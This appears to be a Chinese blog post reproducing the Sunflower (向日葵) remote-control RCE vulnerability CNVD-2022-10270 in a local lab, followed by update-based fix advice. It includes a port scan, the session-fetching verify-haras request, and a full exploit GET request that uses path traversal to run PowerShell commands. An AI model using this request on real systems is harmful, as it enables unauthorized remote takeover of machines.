CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议
本文仅为验证漏洞,在本地环境测试验证,无其它目的
漏洞编号:
CNVD-2022-03672/CNVD-2022-10270
漏洞说明:
向日葵是一款免费的集远程控制电脑手机、远程桌面连接、远程开机、远程管理、支持内网穿透的一体化远程控制管理工具软件。2022年2月5日,CNVD公开向日葵简约版存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。2022年2月15日,CNVD公开向日葵个人版for Windows存在命令执行漏洞,攻击者可利用该漏洞获取服务器控制权。
漏洞影响范围:
- 向日葵个人版 for Windows <= 11.0.0.33
- 向日葵简约版 <= V1.0.1.43315(2021.12)
漏洞级别:
高危
漏洞复现:
此处演示向日葵个人版,简约版没找到旧的安装包
版本:
使用nmap扫描工具,扫描向日葵所在目标机IP,查看开放端口:】
nmap -p 40000-65535 192.168.32.129
可以看到,部署向日葵的目标机开放了如下端口:
依次通过浏览器访问ip+端口,直到出现如下图所示,在此环境中访问49200端口即出现JSON信息:
IP:49200/
尝试获取session,先测试目标机器是否存在/cgi-bin/rpc界面,浏览器继续访问:
IP:49200/cgi-bin/rpc
测试存在界面后,打开BP,浏览器加BP代理,在BurpSuite中获取刚才访问的界面,选择【Send to Repeater】:
修改数据包为POST,并传入数据:action=verify-haras,点击【Send】,即可获取到session:
修改数据包,添加session,并修改参数进行命令执行,下方ipconfig可进行修改为其他参数进行测试,例如替换为whoami:
GET /check? cmd=ping../../../Windows/System32/WindowsPowerShell/v1.0/powershell.exe+%20ipconfig HTTP/1.1 Host: 192.168.32.129:54107 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0 Cookie:CID=dmPqDgSa8jOYgp1Iu1U7l1HbRTVJwZL3 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
漏洞修复:
参考【贝锐】
PC端用户可通过官网直接升级到最新版本
通过软件检查更新
(1)向日葵远程控制
(2)蒲公英异地组网
(3)花生壳内网穿透
开启软件自动更新
向日葵远程控制
- 打开设置
- 选择常规设置
- 找到软件更新选项,并将更新选项修改为:自动更新
CNVD-2022-03672/CNVD-2022-10270:向日葵简约版/向日葵个人版for Windows命令执行漏洞复现及修复建议相关推荐
- 【漏洞复现】CNVD-2022-10270向日葵远程代码执行
声明:本文内容仅供学习参考 目录 声明:本文内容仅供学习参考 一.漏洞介绍 二.影响范围 三.漏洞复现 复现思路一: 复现思路二: 一.漏洞介绍 向日葵远程控制是上海贝锐信息科技股份有限公司开发的一款 ...
- 复现CVE-2022-10270(向日葵远程代码执行漏洞)
目录 引言 漏洞描述 影响版本: 原理: 环境搭建 手动复现 脚本复现 修复建议 引言 本文内容仅供学习参考,若读者利用本文内容做出违法行为,笔者不提供担保!!! 漏洞描述 向日葵是一款免费的,集远程 ...
- 只能在公司代码XXX的期间 2022/03 和2022/02 中记账,MMPV打开物料账记账期间
在收货的时候报错:只能在公司代码XXX的期间 2022/03 和2022/02 中记账 说明:当前的时间与目前已开的记账期间不符. MMRV查看当前记账期间 以下截图只是示例,没有当时的截图 用MMP ...
- 2022.4.30—2022.6.22 学习报告
目录 2022.4.30 2022.5.2 数据流图(Dataflow Graph) Sesssion 构建计算图 2022.5.3 Deep Label Distribution Learning ...
- 后量子密码芯片研究取得重大突破,论文入选ISSCC 2022和CHES 2022
允中 发自 凹非寺 量子位 报道 | 公众号 QbitAI 近期,国际固态电路顶级会议ISSCC 2022和密码硬件顶级会议CHES 2022公布了论文入选情况,沐创集成电路分别有1篇论文入选ISSC ...
- 华科计算机考研2022年分数线,2022年华中科技大学软件工程考研分数线、参考书、上岸前辈初复试经验...
原标题:2022年华中科技大学软件工程考研分数线.参考书.上岸前辈初复试经验 历年录取分数线: 2019年:单科分数线60,60,90,90,总分要求360分: 2018年:单科分数线55,55,90 ...
- Hibiscus的脑机接口学习周报(2022/12/26~2022/1/1)
2022/12/26(星期一) 在学习使用python mne库读取.set类型数据时,遇到了类似如下报错:buffer is too small (来源于Python读取.set格式的脑电数据出现b ...
- 第一周总结(2022.10.17~2022.10.22)
本周内容: 本周学习了前端一些基本的HTML标签以及css(网页修饰)---完成简单的登录/注册/一些首页的页面布局. DAY1 1.HTML基础学习 HTML:超文本标记语言(Hyper Text ...
- 2022年度总结——2022我在CSDN的那些事暨2023我的目标展望:Pursue freedom Realize self-worth
关于年度征文: 活动地址:2022年度征文活动页-CSDN ❗注意:PC端目录请看文章左手边(默认),app端(移动端)目录请看导航栏处
最新文章
- 大二上学期软件工程概论学习进度表(第十二周)
- java 反射 参数名_JAVA 8 反射获取参数名
- VTK:IO之ReadCML
- 前端学习(2645):懂代码之header表头页之未读消息
- JavaScript | 将十进制转换为十六进制,反之亦然
- matlab 调用c++编译好的文件出现问题
- 关于计算机的幻想作文600字,科学幻想作文600字
- c判断数组是否为空_剑指offer编程题 1.二维数组中的查找
- Linux-Anaconda-pycharm 安装 配置
- Java毕业设计——员工管理系统
- 利用计算机解决鸡兔同笼问题,用计算机解决“鸡兔同笼”
- 最好用的屏幕录像软件录制教程分享
- 什么是flex布局,它的常用属性有哪些
- html 防网页假死,HTML 5 Web开发:防止浏览器假死的方法
- 其次线性方程组,行列式为0,一定有非0解.
- 信息学奥赛真题解析(美国信息学回文数)
- [120309]板撸妹子两只(微福利)
- 论文阅读笔记:Multi-view adaptive graph convolutions for graph classification
- Java中函数及递归的使用(附思维导图)——java面试知识点
- 传统开发有必要学Dubbo吗